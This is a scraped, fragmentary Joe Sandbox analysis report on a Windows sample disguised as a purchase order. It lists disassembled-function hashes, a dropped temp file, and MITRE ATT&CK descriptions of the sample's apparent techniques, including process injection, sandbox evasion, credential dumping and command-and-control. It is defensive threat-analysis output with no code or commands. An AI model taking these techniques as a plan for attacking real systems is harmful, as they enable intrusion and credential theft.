Function 0102EE48 Relevance: 6.3, APIs: 4, Instructions: 347COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 22d0a6cbabc68a6599b1516e24bcf1b18d9c9ef7301e823e0f9cfc5ad6b59673
Instruction ID: e1a492bc5593a076608f0dba85608b37a4b0cc1a9a94325c7404b90cfd4754b9
Opcode Fuzzy Hash: 22d0a6cbabc68a6599b1516e24bcf1b18d9c9ef7301e823e0f9cfc5ad6b59673
Instruction Fuzzy Hash: 4EE11D70D0022ACFCF65CFA9D980AADBBF5FF48340F24456AE986A7625D735A840CF10

Function 0107EBD0 Relevance: 6.2, APIs: 4, Instructions: 187timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 0107EC61
RtlDebugPrintTimes.NTDLL ref: 0107EC89
RtlDebugPrintTimes.NTDLL ref: 0107ED2C
RtlDebugPrintTimes.NTDLL ref: 0107EDE0

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 356ee7bbeff266676ace895ea0a6247367cf5131576935afa75247d098d5df1b
Instruction ID: c8588b612f9a04b80a0c3a29d225bd32ffcd7cf9d726f7b981ba97c9d137b4c1
Opcode Fuzzy Hash: 356ee7bbeff266676ace895ea0a6247367cf5131576935afa75247d098d5df1b
Instruction Fuzzy Hash: E3713871E012199FDF05DFA8C884AEDBBF5BF48314F1440AADA55EB254D734A901CF68

Function 010DA04A Relevance: 6.2, APIs: 4, Instructions: 170timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 010DA0F7
RtlDebugPrintTimes.NTDLL ref: 010DA1AA
RtlDebugPrintTimes.NTDLL ref: 010DA1CE
RtlDebugPrintTimes.NTDLL ref: 010DA1E3

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 636327e5a9557740d33f361e45e6fcdae0382b81bad2929de4d13eab2600140d
Instruction ID: fc0a3eedb44c5dbfb4ace7425ff774e325bd6b1c13af73b8dfa4c2f85985e069
Opcode Fuzzy Hash: 636327e5a9557740d33f361e45e6fcdae0382b81bad2929de4d13eab2600140d
Instruction Fuzzy Hash: 22516D39700712DFEB58CE28C891A29BBE1FB89354B1441ADEA86C7711DB75EC41CB80

Function 0107EE56 Relevance: 6.2, APIs: 4, Instructions: 150timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 0107EEED
RtlDebugPrintTimes.NTDLL ref: 0107EF12
RtlDebugPrintTimes.NTDLL ref: 0107EFA4
RtlDebugPrintTimes.NTDLL ref: 0107EFF8

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 0094c177b46ea509056325bfc04f3276a6c11a838c1e142970af7cbad13ecb92
Instruction ID: 77fa35a33dee7da77c706a30692b61d499cf10777d0f11f1a4c5a11849fdadb5
Opcode Fuzzy Hash: 0094c177b46ea509056325bfc04f3276a6c11a838c1e142970af7cbad13ecb92
Instruction Fuzzy Hash: 9A513671E012199FDF09CF98D845AEDBBF2BF48314F14806AE955BB250D735A900CF58

Function 00EB39F0 Relevance: 5.0, Strings: 4, Instructions: 16COMMON

Download Yara Rule

Strings

0, xrefs: 00EB3A17
age=, xrefs: 00EB3A0F
8, xrefs: 00EB39F5
max-, xrefs: 00EB3A07

Memory Dump Source

Source File: 00000000.00000002.22426113758.0000000000EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_eb0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID: 0$8$age=$max-
API String ID: 0-559456555
Opcode ID: 8a293dfe26f6682d128b11301be743e55cc3f071413bb7585c5d37785e3db284
Instruction ID: 811c5ee94328c23f4612df9c3b41a467774fdfad58b2de827a85867e8bb15c72
Opcode Fuzzy Hash: 8a293dfe26f6682d128b11301be743e55cc3f071413bb7585c5d37785e3db284
Instruction Fuzzy Hash: 8FD0123841838566C7068B44C84434B7EE0FB48358F84064CF8C8A6253D76C4205D686

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report PO_62401394_MITech_20250601.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\17O3k-2I

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

Windows Analysis Report
PO_62401394_MITech_20250601.exe

Function 00C38B13 Relevance: 2.9, Strings: 2, Instructions: 433
COMMON

Function 00C21B91 Relevance: 2.9, Strings: 2, Instructions: 382
COMMON

Function 00C37CA3 Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Function 00C4CB43 Relevance: 1.5, APIs: 1, Instructions: 25
nativeCOMMON

Function 01042B90 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Function 01042BC0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Function 01042A80 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Function 00C344C1 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 69
threadwindowCOMMON

Function 00C344F3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60
threadwindowCOMMON

Function 00C4CEB3 Relevance: 1.5, APIs: 1, Instructions: 29
memoryCOMMON

Function 00C4CE63 Relevance: 1.5, APIs: 1, Instructions: 29
memoryCOMMON

Function 00C4CF03 Relevance: 1.5, APIs: 1, Instructions: 25
COMMON

Function 01042B2A Relevance: 1.5, APIs: 1, Instructions: 8
libraryCOMMON